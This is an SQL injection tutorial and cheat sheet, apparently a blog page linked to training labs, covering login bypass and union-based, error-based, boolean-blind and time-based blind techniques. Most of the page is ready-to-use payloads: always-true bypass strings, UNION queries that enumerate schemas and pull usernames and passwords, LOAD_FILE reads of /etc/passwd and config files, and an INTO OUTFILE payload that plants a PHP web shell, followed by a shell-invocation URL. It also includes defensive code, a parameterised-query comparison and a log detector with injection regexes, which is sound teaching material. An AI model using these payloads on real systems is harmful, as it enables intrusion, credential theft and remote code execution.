SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
Subverting query logic is used to bypass authentication on a login page. In this technique, the attacker injects an always-true condition such as ' or 1=1 or ' or '1'='1'-- - so that the application's credential-matching query succeeds regardless of the username and password supplied. Some always-true payloads:
' or '1' = '1
' or '1' = '1'
' or '1' = '1 -- -
' or '1' = '1 #
👁️🗨️ For more payloads, check the PayloadsAllTheThings GitHub repo: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
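The reason the always-true payloads above work is that the application splices user input into the SQL text, so the quote and the OR become part of the query's grammar. The following is an added example (not code from the original page) that reproduces a login check both ways against a constructed in-memory SQLite table, so you can see the bypass succeed against string concatenation and fail against a parameterised query. The table name, the sample row and the two login functions are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample credential; nothing here comes from a real system.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    # The quote in the payload closes the literal; ' or '1'='1 makes the WHERE
    # clause always true, and -- - comments out whatever follows.
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: input is bound as data and can never close the quote."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(username, password):
    """Return (vulnerable_result, safe_result) for one username/password pair."""
    conn = make_db()
    try:
        return login_vulnerable(conn, username, password), login_safe(conn, username, password)
    finally:
        conn.close()


if __name__ == "__main__":
    for creds in [("admin", "correct-horse"),      # genuine login
                  ("admin", "' or '1'='1"),        # always-true payload in the password
                  ("x", "' or 1=1-- -"),            # comment variant
                  ("admin'-- -", "anything")]:     # comment out the password check
        print(creds, "->", compare(*creds))
```

The genuine login returns (True, True); every payload row returns (True, False). Binding parameters removes the whole class of bypass shown on this page, which is why it is the primary fix rather than input filtering.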
In simple cases, the output of both the intended query and the injected query may be printed directly on the front end, where we can read it. This is known as in-band SQL injection, and it has two types: union-based and error-based.
Error-based: PHP or SQL error messages are returned to the front end.
Union-based: determine the fixed column count, then use a UNION query to pull database information.
Find the injectable parameter using fuzzing tools or manually.
Use the payloads given below:
Payload   URL encoded
'         %27
"         %22
#         %23
;         %3B
)         %29
If we get an SQL error, the parameter is subject to error-based SQL injection; from there, use sqlmap for automated SQL injection testing, or continue testing manually.
Find the actual column count using ORDER BY n / ORDER BY n-- - (increase n until the query errors).
Use that column count in a UNION query.
Example: ' union select 1,2,3-- -
Check which column numbers are displayed on the target page.
Place the union-based payload in a displayed column to extract data from the database.
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Here, dev is the database name; replace it with your target database name.
' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Here, credentials is the table name; replace it with your target table name.
' UNION select 1, username, password, 4 from dev.credentials-- -
Here username and password are column names, dev is the database name, and credentials is the table name.
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
SELECT super_priv FROM mysql.user
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
Now that we know we have enough privileges to read local system files, let us do that using the LOAD_FILE() function. The LOAD_FILE() function can be used in MariaDB / MySQL to read data from files. The function takes in just one argument, which is the file name. The following query is an example of how to read the /etc/passwd file:
SELECT LOAD_FILE('/etc/passwd');
Example:
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php.
' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
Example (writing a file with INTO OUTFILE, which requires the FILE privilege and a writable path under secure_file_priv):
' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
Web Shell Upload:
' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Basic PHP Web Shell:
<?php system($_REQUEST['cmd']); ?>
OR
<?php system($_GET['cmd']); ?>
Example:
url/upload_file.php?parameter=command
http://cyberteach360.com.bd/shell.php?cmd=id
Boolean-based SQL injection refers to the response we receive back from our injection attempts, which could be true/false, yes/no, on/off, 1/0 or any response that can only ever have two outcomes. That outcome tells us whether our SQL injection payload was successful or not. On first inspection, you may feel that such a limited response cannot provide much information. In fact, with just these two responses it is possible to enumerate a whole database structure and its contents.
1. admin123' UNION SELECT 1;--
2. admin123' UNION SELECT 1,2,3;--
If the response is true for 1,2,3 but false for 1,2,3,4, the target column count is 3.
admin123' UNION SELECT 1,2,3 where database() like 'some character%';--
Example:
admin123' UNION SELECT 1,2,3 where database() like 's%';--
Change the character sequentially and check whether the response is true or false. Suppose the database name found this way is sqli_three.
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
Change the character sequentially and check whether the response is true or false. Suppose the table name found this way is users.
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';
After repeating this process sequentially you will get the column names. Suppose one column is username and another is password.
admin123' UNION SELECT 1,2,3 from users where username like 'a%
After repeating this process sequentially you will get the username value, which here is admin.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
If you do this properly, you will recover the password; the credentials are username=admin, password=3356.
A time-based blind SQL Injection is very similar to the above Boolean based, in that the same requests are sent, but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as SLEEP(x) alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement. So, for example, when trying to establish the number of columns in a table, you would use the following query:
admin123' UNION SELECT SLEEP(5);--
If there was no pause in the response time, we know that the query was unsuccessful, so like on previous tasks, we add another column:
admin123' UNION SELECT SLEEP(5),2;--
If there is again no pause in the response time, increase the column count:
admin123' UNION SELECT SLEEP(5),2,3;--
admin123' UNION SELECT SLEEP(5),2,3 where database() like 'u%';--
Here the database name is sqli_four.
admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'a%';--
Here the table name is users.
admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
Here the column names are username and password.
admin123' UNION SELECT SLEEP(5),2,3 from users where username like 'a%
Here the username is admin.
admin123' UNION SELECT SLEEP(5),2,3 from users where username='admin' and password like 'a%
Here the password is pass, so the target login credentials are username: admin, password: pass.
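Every technique on this page, from the single-quote probes in the URL-encoded payload table through the UNION, LOAD_FILE and SLEEP payloads in the union-based and blind sections, leaves a recognisable trace in the web server's access log once the query string is URL-decoded. The following is an added example (not code from the original page) of a small log triage script that decodes each request, applies a few indicator regexes, and also correlates a bare quote with a 5xx response, which is the error-based probing signal described above. The log lines, client addresses and indicator names are constructed for the demonstration and are not from any real system.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed indicator regexes, applied to the URL-decoded query string.
INDICATORS = {
    "quote_probe":  re.compile(r"['\"]\s*(or|and)\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+|['\"]\s*(--|#)", re.I),
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "schema_enum":  re.compile(r"\binformation_schema\.|\bmysql\.user\b", re.I),
    "file_access":  re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I),
    "time_based":   re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

# Constructed Apache combined-log style sample; addresses and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=laptop HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=%27 HTTP/1.1" 500 120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=%27+union+select+1%2C2%2C3--+- HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=%27+UNION+SELECT+1%2CLOAD_FILE%28%22%2Fetc%2Fpasswd%22%29%2C3%2C4--+- HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /login.php?u=admin123%27+UNION+SELECT+SLEEP%285%29%2C2%2C3%3B-- HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /search.php?q=o%27reilly HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_query(target):
    """Return the query string of a request target, URL-decoded twice to catch double encoding."""
    return unquote_plus(unquote_plus(urlsplit(target).query))


def classify(line):
    """Return (ip, status, [indicator names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("target"))
    status = int(m.group("status"))
    names = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    # A quote character followed by a server error is the error-based probing signal;
    # a quote in a 200 response (o'reilly) is just data and is not flagged.
    if status >= 500 and ("'" in decoded or '"' in decoded):
        names.append("quote_with_server_error")
    return m.group("ip"), status, names


def scan_log(text):
    """Return (line_no, ip, status, indicators) for every line that hit at least one indicator."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        result = classify(line)
        if result and result[2]:
            alerts.append((n, result[0], result[1], result[2]))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Four of the six constructed lines are flagged; the first (a normal search) and the last (a legitimate apostrophe) are not. Regex indicators like these are a triage aid for log review, not a substitute for parameterised queries: a single client producing a quote-then-500 followed by UNION and SLEEP requests within seconds is the sequence this page walks through, and that pattern is worth alerting on even when each request alone looks marginal.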
https://tryhackme.com/room/sqlinjectionlm
https://tryhackme.com/room/sqhell
https://academy.hackthebox.com/module/33/section/177
https://portswigger.net/web-security/sql-injection